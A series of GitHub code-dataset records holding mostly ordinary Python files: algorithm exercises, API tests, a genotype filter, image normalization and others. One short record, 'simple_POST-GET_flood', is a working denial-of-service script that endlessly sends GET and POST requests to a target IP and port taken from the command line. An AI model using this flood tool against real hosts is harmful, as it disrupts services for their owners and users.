it.\n\nThere is a cycle in a linked list if there is some node in the list that can be reached again by continuously following the next pointer. \nInternally, pos is used to denote the index of the node that tail's next pointer is connected to. Note that pos is not passed as a parameter.\n\nReturn true if there is a cycle in the linked list. Otherwise, return false.\n'''\n\nfrom typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x, next=None):\n self.val = x\n self.next = next\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n if not head:\n return False\n h1 = head.next\n h2 = head\n while h1:\n if h1.next == h2 or h1.next == h1:\n return True\n h2 = h2.next\n if h2 == h1:\n h1 = h1.next\n h2 = head\n \n return False\n \n def hasCycle2(self, head: Optional[ListNode]) -> bool:\n fast = head\n slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n\n return False\n\nsolution = Solution()\nhead = ListNode(-1, ListNode(-7, ListNode(7, ListNode(-4, ListNode(19, ListNode(6, ListNode(-9, ListNode(-5, ListNode(-2, ListNode(-5))))))))))\ncur = head\nwhile cur.next:\n cur = cur.next\ncur.next = cur\n\nprint(solution.hasCycle2(head))\n","repo_name":"BoTWGitHub/LeecodePractice","sub_path":"python/LeetCode Quiz/No141.py","file_name":"No141.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26011952210","text":"from fastapi.testclient import TestClient\nfrom fastapi.security import OAuth2PasswordRequestForm\nfrom fastapi import Depends\nfrom sqlalchemy.orm import Session\n\nfrom attendance.main import app, login\nfrom attendance import crud\nfrom attendance.database import get_db\nimport json\n\nclient = TestClient(app)\n\nasync def override_dependency(form_data: OAuth2PasswordRequestForm= Depends(), db:Session=Depends(get_db)):\n user_dict = crud.authenticate_user(db, account=form_data.username, passwd=form_data.password)\n return {\"access_token\": user_dict.account, \"token_type\": \"bearer\"}\n\napp.dependency_overrides[login] = override_dependency\n\nofficer = {\"accept\": \"application/json\", \"Authorization\": \"Bearer officer1\", \"Content-Type\": \"application/json\"}\nmanager = {\"accept\": \"application/json\", \"Authorization\": \"Bearer manager1\", \"Content-Type\": \"application/json\"}\nhr = {\"accept\": \"application/json\", \"Authorization\": \"Bearer hr1\", \"Content-Type\": \"application/json\"}\nhr_manager = {\"accept\": \"application/json\", \"Authorization\": \"Bearer hrmanager1\", \"Content-Type\": \"application/json\"}\nboss = {\"accept\": \"application/json\", \"Authorization\": \"Bearer boss1\", \"Content-Type\": \"application/json\"}\n\ndef test_put_overtime_officer():\n overtime = {\n 'day': '2021-08-07',\n 'start': '13:00',\n 'end': '17:00',\n 'reason': '加班時間並不會處理私事'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=officer)\n print(response.json())\n assert response.status_code == 200\n\ndef test_put_overtime_wronguser():\n overtime = {\n 'day': '2021-08-07',\n 'start': '13:00',\n 'end': '17:00',\n 'reason': '假日被迫工程掠地'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=manager)\n assert response.status_code == 401\n assert response.json() == {\n \"detail\": \"Wrong User.\"\n }\n\ndef test_put_overtime_wrongtime():\n overtime = {\n 'day': '2021-08-08',\n 'start': '17:00',\n 'end': '19:00',\n 'reason': '錯誤的開始'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=officer)\n assert response.status_code == 400\n assert response.json() == {\n \"detail\": \"Wrong start time.\"\n }\n\ndef test_put_overtime_wrongtime2():\n overtime = {\n 'day': '2021-08-02',\n 'start': '17:00',\n 'end': '19:00',\n 'reason': 'P.H.'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=officer)\n assert response.status_code == 400\n assert response.json() == {\n \"detail\": \"Wrong start time.\"\n }\n\ndef test_put_overtime_wrongtime3():\n overtime = {\n 'day': '2021-08-01',\n 'start': '13:00',\n 'end': '08:00',\n 'reason': '圓周率之花'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/3\", data=overtime_json, headers=hr)\n assert response.status_code == 400\n assert response.json() == {\n \"detail\": \"Wrong time.\"\n }\n\ndef test_put_overtime_notfound():\n overtime = {\n 'day': '2021-08-01',\n 'start': '13:00',\n 'end': '17:00',\n 'reason': '圓周率之花'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/20\", data=overtime_json, headers=hr)\n assert response.status_code == 404\n assert response.json() == {\n \"detail\": \"Overtime not found.\"\n }","repo_name":"auyu0408/attendance_backend","sub_path":"tests/test_overtime_put.py","file_name":"test_overtime_put.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72354777513","text":"from databasecon import *\nimport csv, cx_Oracle\nfrom StockPortfolioConst import *\ndef fetchCapName(stCode):\n cur=dbconnect()\n cur.execute(const.STOCKMARKETCAP%stCode)\n record=cur.fetchall()\n return record[0][0]\n\ndef marketCapMaster(marketCapAmount):\n try:\n cur = dbconnect()\n cur.execute(const.MARKETCAP%(marketCapAmount))\n records=cur.fetchall()\n for column in records:\n capName = column[0]\n return capName\n\n\n except cx_Oracle.DatabaseError as db:\n print(\"Error in Database\",db)\ndef getSectorAndStockInfo(stockCode):\n cur=dbconnect()\n cur.execute(const.GETALL%stockCode)\n records = cur.fetchall()\n return records[0]","repo_name":"manasnayak/StockPortfolio","sub_path":"StockReader.py","file_name":"StockReader.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24571037479","text":"__description__ = '''\n 用来封装windows执行dos命令,分两种,一种是收集执行结果,一种是不需要收集执行结果\n '''\n\n\nimport os\nimport subprocess\nfrom tools.logger import logger\n\n\nclass DocCmd:\n\n\n @staticmethod\n def execute_cmd_result(command):\n '''\n 执行command命令,并返回执行结果\n :param command: 传入要执行的命令,字符串格式\n :return:返回执行结果,列表格式\n '''\n result_list = []\n result = os.popen(command).readlines()\n for i in result:\n if i == '\\n':\n continue\n result_list.append(i.strip('\\n')) # strip() 方法用于移除字符串头尾指定的字符\n return result_list\n\n @staticmethod\n def execute_bat(batfile):\n \"\"\"\n :function:执行批处理文件\n :param batfile: .bat路径\n \"\"\"\n logger.debug(f'Prepare to execute bat file : {batfile}')\n popen_obj = subprocess.Popen(batfile, shell=True, stdout=subprocess.PIPE)\n stdout, stderr = popen_obj.communicate()\n if popen_obj.returncode == 0:\n logger.debug(f'Success to execute bat file!')\n else:\n logger.error(f'Fail to execute bat file!')\n\n @staticmethod\n def execute_cmd(command):\n '''\n 仅执行command命令,不收集执行结果\n :param command: 传入要执行的命令,字符串格式\n '''\n logger.info(f\"Launching system order:{command}.\")\n os.system(command)\n","repo_name":"Zhangwenke-git/execution-engine","sub_path":"tools/doc_cmd.py","file_name":"doc_cmd.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20623839261","text":"from errors import errors\nfrom bot import bot_make_move\n\nplayers = ('John', 'Jack')\n\n\ndef pencil_number():\n print('How many pencils would you like to use:')\n while True:\n try:\n num = int(input())\n if num < 0:\n raise ValueError\n except ValueError:\n print(errors[0])\n else:\n if num == 0:\n print(errors[1])\n continue\n return num\n\n\ndef first_player():\n print('Who will be the first ({}, {} ):'.format(players[0], players[1]))\n while True:\n name = input()\n if name not in players:\n print(errors[2].format(players[0], players[1]))\n continue\n return name\n\n\ndef output():\n print('|' * pencils)\n\n\ndef determine_first_turn(f_player):\n first = f_player\n if f_player == players[0]:\n second = players[1]\n else:\n second = players[0]\n return first, second\n\n\ndef make_move(turn):\n global pencils\n if turn == 'Jack':\n num_of_pencils = bot_make_move(turn, pencils)\n return num_of_pencils\n print(turn + \"'s turn:\")\n while True:\n try:\n num_of_pencils = int(input())\n if num_of_pencils <= 0 or num_of_pencils > 3:\n raise ValueError\n except ValueError:\n print(errors[3])\n else:\n return num_of_pencils\n\n\ndef choose_turn(turn, first, second):\n if turn == first:\n turn = second\n else:\n turn = first\n return turn\n\n\ndef gameplay(f_player):\n global pencils\n first, second = determine_first_turn(f_player=f_player)\n turn = first\n while pencils > 0:\n output()\n delete_pencils = make_move(turn=turn)\n if delete_pencils > pencils:\n print(errors[4])\n continue\n pencils -= delete_pencils\n turn = choose_turn(turn=turn,\n first=first,\n second=second)\n print(f'{turn} won!')\n\n\ndef main():\n global pencils\n pencils = pencil_number()\n f_player = first_player()\n gameplay(f_player=f_player)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JustLucifer/JBA_projects","sub_path":"Python/Last Pencil/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3683392100","text":"__author__ = 'prabhanjan'\n\nfrom seamcarving_ca3 import SeamCarving\n\n\ndef main():\n img1 = SeamCarving(\"asu.png\")\n img1.resize_image_to(1)\n\n img2 = SeamCarving(\"HJoceanSmall.png\")\n img2.resize_image_to(60)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"prabhanjan2906/my-python-codes","sub_path":"seamcarving_main_ca3.py","file_name":"seamcarving_main_ca3.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39887405294","text":"from cyvcf2 import VCF\nimport argparse\nimport sys\nimport numpy as np\nimport subprocess\n\n\ndef create_allele_count_dictionary(variant):\n \"\"\"Create a dictionary with the allele count per allele\"\"\"\n\n # Dictionary that stores the count per allele\n allele_count_dictionary = {}\n\n # Determine the reference allele count\n total_number_of_alleles = variant.INFO[\"AN\"]\n total_number_of_alternative_alleles = sum(wrap_in_list(variant.INFO[\"AC\"]))\n reference_allele_count = total_number_of_alleles - total_number_of_alternative_alleles\n allele_count_dictionary[variant.REF] = reference_allele_count\n\n # add counts of the alternative alleles to the allele count dictionary\n # loop over the alternative alleles, lookup the allele count from the AC attribute and add dictionary entry\n alternative_allele_index = 0\n for alternative_allele in variant.ALT:\n allele_count_dictionary[alternative_allele] = wrap_in_list(variant.INFO[\"AC\"])[alternative_allele_index]\n alternative_allele_index += 1\n\n return allele_count_dictionary\n\n\ndef determine_minor_allele(allele_count_dictionary):\n \"\"\"Determine the minor (least frequent) allele.\n If there are multiple alleles with the same lowest count\n then one of these alleles is chosen at random based on position in the dictionary loop.\n There is no way to chose 1 minor allele over the other\"\"\"\n\n minor_allele = None\n\n # Loop over all alleles and their counts\n for allele, allele_count in allele_count_dictionary.items():\n\n # Set the minor allele if:\n # A) minor allele is none\n # B) allele count of current allele is smaller than the allele count for previous determined minor allele\n if not minor_allele or allele_count < allele_count_dictionary[minor_allele]:\n minor_allele = allele\n\n return minor_allele\n\n\ndef determine_major_allele(allele_count_dictionary):\n \"\"\"Determine the major (most frequent) allele.\n If there are multiple alleles with the same highest count\n then one of these alleles is chosen at random based position in the dictionary loop.\n There is no way to chose 1 major allele over the other\"\"\"\n\n major_allele = None\n\n # Loop over all alleles and their counts\n for allele, allele_count in allele_count_dictionary.items():\n\n # Set the major allele if:\n # A) major allele is none\n # B) allele count of current allele is higher than the allele count for previous determined major allele\n if not major_allele or allele_count > allele_count_dictionary[major_allele]:\n major_allele = allele\n\n return major_allele\n\n\ndef determine_non_major_alleles(allele_count_dictionary):\n \"\"\"Determine the non-major (least frequent) allele(s).\n All alleles that are not the major allele are returned\"\"\"\n\n major_allele = determine_major_allele(allele_count_dictionary)\n major_allele_set = {major_allele, }\n non_major_allele = set(allele_count_dictionary.keys()) - major_allele_set\n \n return non_major_allele\n\ndef determine_alleles_of_interest(variant, allele_type):\n \"\"\"Determine the allele(s) of interest based on the allele type provided in the CLI\"\"\"\n\n alleles_of_interest = None\n\n # Create a dictionary with the allele count for all alleles\n allele_count_dictionary = create_allele_count_dictionary(variant)\n\n # If the allele type is non-reference, the alleles of interest are all alternative (non-reference) alleles\n if allele_type == \"nref\":\n alleles_of_interest = variant.ALT\n # If the allele type alt1, the alleles of interest is the 1st alternative allele\n if allele_type == \"alt1\":\n alleles_of_interest = variant.ALT[0]\n # If the allele type minor, the alleles of interest is least frequent allele\n if allele_type == \"minor\":\n alleles_of_interest = list(determine_minor_allele(allele_count_dictionary))\n # If the allele type major, the alleles of interest is most frequent allele\n if allele_type == \"major\":\n alleles_of_interest = list(determine_major_allele(allele_count_dictionary))\n # If the allele type non-major, the alleles of interest are all alleles except the major allele\n if allele_type == \"nonmajor\":\n alleles_of_interest = list(determine_non_major_alleles(allele_count_dictionary))\n\n return alleles_of_interest\n\n\ndef samples_required_pass(variant, samples_required_boolean_index, alleles_of_interest, het_or_hom):\n \"\"\"Return True if the samples that are required to be heterozygous or homozygous are indeed heterozygous or homozygous.\n If any of the required samples is missing return False.\n\n The het_or_hom arguments specifies if this function check that the required samples are heterozygous or homozygous.\n The alleles_of_interest specifies the allele for which the required samples should be heterozygous or homozygous.\n\n If there are multiple alleles of interest (for multi-allelic variants and allele type non-reference or non-major)\n the required samples can be heterozygous or homozygous for any of those alleles for this function to return True.\"\"\"\n\n # Number of unique alleles expected\n if het_or_hom == \"het\":\n expected_nr_unique_alleles = 2\n else:\n expected_nr_unique_alleles = 1\n\n # Get the genotypes of the required samples by applying boolean index\n genotypes_samples_of_interest = variant.gt_bases[samples_required_boolean_index]\n\n # Return False if a genotype is missing\n if any(is_missing_genotype(gt) for gt in genotypes_samples_of_interest):\n return False\n\n # Count how many of the required samples have the allele of interest in the desired het or hom state\n number_of_genotypes_match_desired_state = 0\n\n # Loop over the genotypes that should be het or hom with an allele of interest\n for genotype in genotypes_samples_of_interest:\n\n # Check that the genotype\n # A) matches the desired heterozygous or homozygous genotype state\n # (by checking the length of the set of unique alleles of the genotype (het=2, hom=1))\n # B) the genotype allele set contains at least 1 of the alleles of interest.\n # Alleles of interest can be nref, or nonmajor, which can be multiple alleles. (e.g. 1/2 genotype)\n\n # Convert the genotype strings (\"A/T\") to genotype allele sets {A,T}\n genotype_set = genotype_to_allele_set(genotype)\n if len(genotype_set) == expected_nr_unique_alleles and any(allele_of_interest in genotype_set for allele_of_interest in alleles_of_interest):\n number_of_genotypes_match_desired_state += 1\n\n # If all the required samples had the desired het or hom genotype return True\n if number_of_genotypes_match_desired_state == genotypes_samples_of_interest.size:\n return True\n else:\n return False\n\n\ndef count_genotypes_with_allele_of_interest(allele_sets, alleles_of_interest):\n \"\"\" Count the number of heterozygous and homozygous genotypes that contain at least 1 allele of interest\n\n allele_sets argument is a list with the set of alleles for alle samples\n alleles_of_interest is the alleles of interest for the allele type specified in the CLI\"\"\"\n\n count_het_genotype_with_allele_of_interest = 0\n count_hom_genotype_with_allele_of_interest = 0\n\n # Loop over the allele sets of all samples\n for allele_set in allele_sets:\n\n # If there is only 1 unique allele, the genotype is homozygous\n if len(allele_set) == 1:\n # if any allele of interest is in the allele set increase the hom genotype counter\n if any(allele_of_interest in allele_set for allele_of_interest in alleles_of_interest):\n count_hom_genotype_with_allele_of_interest += 1\n # Otherwise there are multiple distinct alleles and the genotype is heterozygous\n else:\n # if any allele of interest is in the allele set increase the het genotype counter\n if any(allele_of_interest in allele_set for allele_of_interest in alleles_of_interest):\n count_het_genotype_with_allele_of_interest += 1\n\n # Return a tuple with the number of genotypes that is heterozygous and homozygous for the alleles of interest\n return count_het_genotype_with_allele_of_interest, count_hom_genotype_with_allele_of_interest\n\n\ndef is_missing_genotype(genotype_string):\n \"\"\"Return True is a genotype is missing\"\"\"\n if genotype_string == \"./.\" or genotype_string == \".|.\" or genotype_string == \".\":\n return True\n else:\n return False\n\n\ndef genotype_to_allele_set(genotype_string):\n \"\"\"Convert a genotype string to a genotype set\n I.e. 'A/T' to {'A','T'}\"\"\"\n\n if '/' in genotype_string:\n separate_char = \"/\"\n else:\n separate_char = \"|\"\n\n return set(genotype_string.split(separate_char))\n\n\ndef parse_arguments(args):\n\n parser = argparse.ArgumentParser(\n description=\"Filter a BCF/VCF input stream on genotype count and state.\")\n parser.add_argument('-i', '--input', type=argparse.FileType('r'), required=False, dest=\"input_file\",\n help=\"Input BCF/VCF file\")\n parser.add_argument('--allele_type', action='store', required=False, dest=\"allele_type\", choices=[\"nref\", \"alt1\", \"minor\", \"major\", \"nonmajor\" ], default=\"nref\",\n help=\"The type of allele on which the MIN and MAX genotype count and required samples list should be applied.\")\n parser.add_argument('--samples_required_het', action='store', type=str, required=False, dest='samples_required_het',\n help='Comma-separated list of samples that are required to be heterozygous for the allele type of interest')\n parser.add_argument('--samples_required_hom', action='store', type=str, required=False, dest='samples_required_hom',\n help='Comma-separated list of samples that are required to be homozygous for the allele type of interest')\n parser.add_argument('--min_het_genotype_count', action='store', type=int, required=False, dest='min_het_genotype_count',\n help='Minimum heterozygous genotype count for the allele type of interest')\n parser.add_argument('--max_het_genotype_count', action='store', type=int, required=False, dest='max_het_genotype_count',\n help='Maximum heterozygous genotype count for the allele type of interest')\n parser.add_argument('--min_hom_genotype_count', action='store', type=int, required=False, dest='min_hom_genotype_count',\n help='Minimum homozygous genotype count for the allele type of interest')\n parser.add_argument('--max_hom_genotype_count', action='store', type=int, required=False, dest='max_hom_genotype_count',\n help='Maximum homozygous genotype count for the allele type of interest')\n\n return parser.parse_args(args)\n\n\ndef print_variant(variant):\n \"\"\"Output a variant to standard out in the VCF format\"\"\"\n print(str(variant), end=\"\")\n\n\ndef apply_filter_criteria(input_vcf,\n allele_type,\n samples_required_het_arg,\n samples_required_hom_arg,\n min_het_genotype_count_arg,\n max_het_genotype_count_arg,\n min_hom_genotype_count_arg,\n max_hom_genotype_count_arg):\n \"\"\"Apply the filter criteria proved in the CLI to VCF input file or VCF input stream.\n Only output variants that pass all the filter criteria to standard out formatted as VCF\"\"\"\n\n # Create a reader for reading from file or stdin\n if input_vcf:\n reader = VCF(input_vcf.name)\n else:\n reader = VCF('-')\n\n # update and print header\n command_line_invocation = subprocess.list2cmdline(sys.argv)\n command_line_invocation = command_line_invocation.replace('\"', '')\n new_header_entry = {\"ID\": \"GenotypeStateAndCount\", \"Description\": command_line_invocation}\n reader.add_filter_to_header(new_header_entry)\n print(reader.raw_header, end=\"\")\n\n # Create boolean index for the required het and hom samples\n # This boolean index is used later to efficiently\n # retrieve the genotypes of required samples from all the variant genotypes\n samples_required_het_boolean_index = None\n samples_required_hom_boolean_index = None\n\n # If the samples that are required to be heterozygous have been specified in the CLI\n # Create the boolean index for the heterozygous samples\n if samples_required_het_arg:\n samples_required_het = samples_required_het_arg.split(\",\")\n samples_required_het_boolean_index = np.array([sample in samples_required_het for sample in reader.samples])\n # If the samples that are required to be homozygous have been specified in the CLI\n # Create the boolean index for the homozygous samples\n if samples_required_hom_arg:\n samples_required_hom = samples_required_hom_arg.split(\",\")\n samples_required_hom_boolean_index = np.array([sample in samples_required_hom for sample in reader.samples])\n\n # Numpy vectorize function to convert genotype strings to allele sets\n # Is applied later on to \"map\" all genotype strings to genotype allele sets\n vfunc=np.vectorize(genotype_to_allele_set)\n\n # Count variants that pass the filter criteria and are outputted, mainly for unit testing\n count_variants_pass = 0\n\n # Loop over all variants\n for variant in reader:\n\n # Determine the alleles of intererest for the allele type specified in the CLI\n alleles_of_interest = determine_alleles_of_interest(variant, allele_type)\n\n # If samples are required to be het and they aren't skip this variant\n if samples_required_het_arg and not samples_required_pass(variant, samples_required_het_boolean_index, alleles_of_interest, \"het\"):\n continue\n # If samples are required to be hom and they aren't skip this variant\n if samples_required_hom_arg and not samples_required_pass(variant, samples_required_hom_boolean_index, alleles_of_interest, \"hom\"):\n continue\n\n # If any MIN or MAX het/hom count is not none\n # Thus a there at least 1 filter criteria genotype count\n if min_het_genotype_count_arg is not None \\\n or max_het_genotype_count_arg is not None \\\n or min_hom_genotype_count_arg is not None\\\n or max_hom_genotype_count_arg is not None:\n\n # Convert genotype string array to genotype allele sets array\n allele_sets = vfunc(variant.gt_bases)\n\n # Count the number of genotypes that are heterozygous or homozygous for the alleles of interest\n count_het_genotype_with_allele_of_interest, count_hom_genotype_with_allele_of_interest = count_genotypes_with_allele_of_interest(allele_sets,\n alleles_of_interest)\n\n # Skip variant if count of het genotypes is lower than the minimum\n if min_het_genotype_count_arg is not None and count_het_genotype_with_allele_of_interest < min_het_genotype_count_arg:\n continue\n # Skip variant if count of het genotypes is higher than the maximum\n if max_het_genotype_count_arg is not None and count_het_genotype_with_allele_of_interest > max_het_genotype_count_arg:\n continue\n # Skip variant if count of hom genotypes is lower than the minimum\n if min_hom_genotype_count_arg is not None and count_hom_genotype_with_allele_of_interest < min_hom_genotype_count_arg:\n continue\n # Skip variant if count of hom genotypes is higher than the maximum\n if max_hom_genotype_count_arg is not None and count_hom_genotype_with_allele_of_interest > max_hom_genotype_count_arg:\n continue\n\n print_variant(variant)\n\n # Increment the number of variants that passed the filter criteria and are outputted\n count_variants_pass += 1\n\n return count_variants_pass\n\n\ndef main():\n\n args = parse_arguments(sys.argv[1:])\n\n apply_filter_criteria(args.input_file,\n args.allele_type,\n args.samples_required_het,\n args.samples_required_hom,\n args.min_het_genotype_count,\n args.max_het_genotype_count,\n args.min_hom_genotype_count,\n args.max_hom_genotype_count)\n\n\ndef wrap_in_list(object):\n \"\"\"If the object is not a list or tuple wrap the object (most often a string or integer) in a list\"\"\"\n\n if isinstance(object, list) or isinstance(object, tuple):\n return object\n else:\n return [object]\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"NeillGibson/VCF_genotype_state_and_count_filter","sub_path":"genotype_state_and_count_filter.py","file_name":"genotype_state_and_count_filter.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40422110046","text":"import os, fnmatch, operator\nfrom collections import OrderedDict\nfrom src.conversation import Conversation\nfrom src.conversation_util import get_message_number_per_conversation \n\ndef get_all_conversations(root_dir_path):\n filepaths = find(\"message_1.json\", root_dir_path)\n return get_all_conversations_from_filepaths(filepaths)\n\ndef get_all_conversations_from_filepaths(filepaths):\n conversations = []\n for filepath in filepaths:\n conversations.append(get_conversation_from_file(filepath))\n return conversations\n\ndef get_conversation_from_file(filepath):\n return Conversation(filepath)\n\ndef find(pattern, path):\n result = []\n for root, dirs, files in os.walk(path):\n for name in files:\n if fnmatch.fnmatch(name, pattern):\n result.append(os.path.join(root, name))\n return result\n\ndef main():\n files = find(\"message_1.json\", '/home/marcin/Projects/Facebook_analysis/messages/inbox/') \n print(len(files))\n conversation = get_conversation_from_file(files[0])\n print(conversation.participant_names)\n conversations = get_all_conversations_from_filepaths(files)\n print(len(conversations))\n conv_num = list(get_message_number_per_conversation(conversations))\n for i in range(30):\n print(i+1,':',conv_num[i])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MarcinWiech/Analyse-Your-Facebook-Information","sub_path":"src/file_crawler.py","file_name":"file_crawler.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19686132064","text":"logs = list()\nguard_time = dict()\nguard_logs = dict()\n\nwith open(\"input1.txt\") as file:\n for row in file:\n logs.append(row.strip())\n if \"begins shift\" in row:\n guard_time[int(row.split(\" \")[3][1:])] = 0\n guard_logs[int(row.split(\" \")[3][1:])] = dict()\n for x in range(60):\n guard_logs[int(row.split(\" \")[3][1:])][x] = 0\n\nlogs.sort()\n\ncurrent_guard = 0\nsleep = False\nstart_time = 0\nfor log in logs:\n if \"begins shift\" in log or current_guard == 0:\n sleep = False\n current_guard = int(log.split(\" \")[3][1:])\n else:\n if \"falls\" in log:\n start_time = int(log.split(\" \")[1][3:5])\n sleep = True\n if \"wakes\" in log:\n wake_time = int(log.split(\" \")[1][3:5])\n guard_time[current_guard] += (wake_time - start_time)\n for x in range(start_time, wake_time):\n guard_logs[current_guard][x] += 1\n sleep = False\n\n# part 1\nsleepiest_guard = max(guard_time, key=guard_time.get)\nsleepiest_minute = max(guard_logs[sleepiest_guard], key=guard_logs[sleepiest_guard].get)\nprint(sleepiest_guard*sleepiest_minute)\n\n# part 2\nmost_frequently_asleep_guard = 0\nmost_frequently_asleep_minute = 0\nmost_frequently_asleep_value = 0\nfor guard, guard_log in guard_logs.items():\n for minute, value in guard_log.items():\n if value > most_frequently_asleep_value:\n print(\"found new sleepier: {}\".format(value))\n most_frequently_asleep_guard = guard\n most_frequently_asleep_minute = minute\n most_frequently_asleep_value = value\n\nprint(most_frequently_asleep_guard*most_frequently_asleep_minute)\n","repo_name":"mkolas/advent2018","sub_path":"04/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71813128553","text":"import socket, os, string, argparse\r\n\r\n\r\nps = argparse.ArgumentParser()\r\nps.add_argument('-ip', type=str, required=True)\r\nps.add_argument('-p', type=int, required=True)\r\narg=ps.parse_args()\r\n\r\nIP_ADDR=arg.ip\r\nPORT=arg.p\r\n\r\ndef attack():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((IP_ADDR, PORT))\r\n request = \"GET / HTTP/1.1\\r\\nHost:%s\\r\\n\\r\\n\" % IP_ADDR\r\n s.send(request.encode())\r\n request2 = \"POST / HTTP/1.1\\r\\nHost:%s\\r\\n\\r\\n\" % IP_ADDR\r\n s.send(request2.encode())\r\n s.close()\r\n \r\nwhile True: \r\n attack()\r\n","repo_name":"chdbyq/simple_POST-GET_flood","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41388538367","text":"\"\"\"\nImage normalization\n\"\"\"\nfrom collections.abc import Sequence\nfrom typing import Tuple\n\nimport numpy as np\nimport torch as ch\nfrom numpy import dtype\nfrom numpy.random import rand\nfrom dataclasses import replace\nfrom typing import Callable, Optional, Tuple\nfrom ..pipeline.allocation_query import AllocationQuery\nfrom ..pipeline.operation import Operation\nfrom ..pipeline.state import State\nfrom ..pipeline.compiler import Compiler\n\ndef ch_dtype_from_numpy(dtype):\n return ch.from_numpy(np.zeros((), dtype=dtype)).dtype\n\nclass NormalizeImage(Operation):\n \"\"\"Fast implementation of normalization and type conversion for uint8 images\n to any floating point dtype.\n\n Works on both GPU and CPU tensors.\n\n Parameters\n ----------\n mean: np.ndarray\n The mean vector.\n std: np.ndarray\n The standard deviation vector.\n type: np.dtype\n The desired output type for the result as a numpy type.\n If the transform is applied on a GPU tensor it will be converted\n as the equivalent torch dtype.\n \"\"\"\n\n def __init__(self, mean: np.ndarray, std: np.ndarray,\n type: np.dtype):\n super().__init__()\n table = (np.arange(256)[:, None] - mean[None, :]) / std[None, :]\n self.original_dtype = type\n table = table.astype(type)\n if type == np.float16:\n type = np.int16\n self.dtype = type\n table = table.view(type)\n self.lookup_table = table\n self.previous_shape = None\n self.mode = 'cpu'\n\n def generate_code(self) -> Callable:\n if self.mode == 'cpu':\n return self.generate_code_cpu()\n return self.generate_code_gpu()\n\n def generate_code_gpu(self) -> Callable:\n\n # We only import cupy if it's truly needed\n import cupy as cp\n import pytorch_pfn_extras as ppe\n\n tn = np.zeros((), dtype=self.dtype).dtype.name\n kernel = cp.ElementwiseKernel(f'uint8 input, raw {tn} table', f'{tn} output', 'output = table[input * 3 + i % 3];')\n final_type = ch_dtype_from_numpy(self.original_dtype)\n s = self\n def normalize_convert(images, result):\n B, C, H, W = images.shape\n table = self.lookup_table.view(-1)\n assert images.is_contiguous(memory_format=ch.channels_last), 'Images need to be in channel last'\n result = result[:B]\n result_c = result.view(-1)\n images = images.permute(0, 2, 3, 1).view(-1)\n\n current_stream = ch.cuda.current_stream()\n with ppe.cuda.stream(current_stream):\n kernel(images, table, result_c)\n\n # Mark the result as channel last\n final_result = result.reshape(B, H, W, C).permute(0, 3, 1, 2)\n\n assert final_result.is_contiguous(memory_format=ch.channels_last), 'Images need to be in channel last'\n\n return final_result.view(final_type)\n\n return normalize_convert\n\n def generate_code_cpu(self) -> Callable:\n\n table = self.lookup_table.view(dtype=self.dtype)\n my_range = Compiler.get_iterator()\n\n def normalize_convert(images, result, indices):\n result_flat = result.reshape(result.shape[0], -1, 3)\n num_pixels = result_flat.shape[1]\n for i in my_range(len(indices)):\n image = images[i].reshape(num_pixels, 3)\n for px in range(num_pixels):\n # Just in case llvm forgets to unroll this one\n result_flat[i, px, 0] = table[image[px, 0], 0]\n result_flat[i, px, 1] = table[image[px, 1], 1]\n result_flat[i, px, 2] = table[image[px, 2], 2]\n\n return result\n\n normalize_convert.is_parallel = True\n normalize_convert.with_indices = True\n return normalize_convert\n\n def declare_state_and_memory(self, previous_state: State) -> Tuple[State, Optional[AllocationQuery]]:\n\n if previous_state.device == ch.device('cpu'):\n new_state = replace(previous_state, jit_mode=True, dtype=self.dtype)\n return new_state, AllocationQuery(\n shape=previous_state.shape,\n dtype=self.dtype,\n device=previous_state.device\n )\n\n else:\n self.mode = 'gpu'\n new_state = replace(previous_state, dtype=self.dtype)\n\n gpu_type = ch_dtype_from_numpy(self.dtype)\n\n\n # Copy the lookup table into the proper device\n try:\n self.lookup_table = ch.from_numpy(self.lookup_table)\n except TypeError:\n pass # This is alredy a tensor\n self.lookup_table = self.lookup_table.to(previous_state.device)\n\n return new_state, AllocationQuery(\n shape=previous_state.shape,\n device=previous_state.device,\n dtype=gpu_type\n 